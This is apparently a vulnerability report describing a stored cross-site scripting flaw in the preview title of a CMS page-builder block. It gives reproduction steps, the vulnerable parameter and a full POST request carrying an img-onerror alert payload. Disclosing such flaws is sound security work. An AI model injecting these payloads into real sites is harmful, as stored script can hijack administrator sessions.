Description

There is accumulated XSS in the preview title of the page.

Proof of Concept

Step 1. Log in to the administrator screen and create a new page.
Step 2. Insert “Browse preview” from “Add new block” and specify Payload in “Preview title”.
Step 3. When you access the preview screen in the saved state, the embedded script (alert) will be executed.

Payload

<img src>

Parameter

o:block[0][o:data][heading]

Request

POST /admin/site/s/test/page/test HTTP/1.1
 ...

o%3Ais_public=1&sitepageform_csrf=f49b093285a9d1c137c456c725a74649-f2ddcd5a1ccc9cb264a38318182dd604&o%3Atitle=test&o%3Aslug=test&o%3Ablock%5B0%5D%5Bo%3Alayout%5D=browsePreview&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bresource_type%5D=items&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bquery%5D=&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blimit%5D=12&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-heading&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-body&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=thumbnail&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bheading%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blink-text%5D=Browse+all

PoC Video

https://drive.google.com/file/d/1PIReOl9qiJBUqw9522ctxrHGBvn8JUOI/view?usp=sharing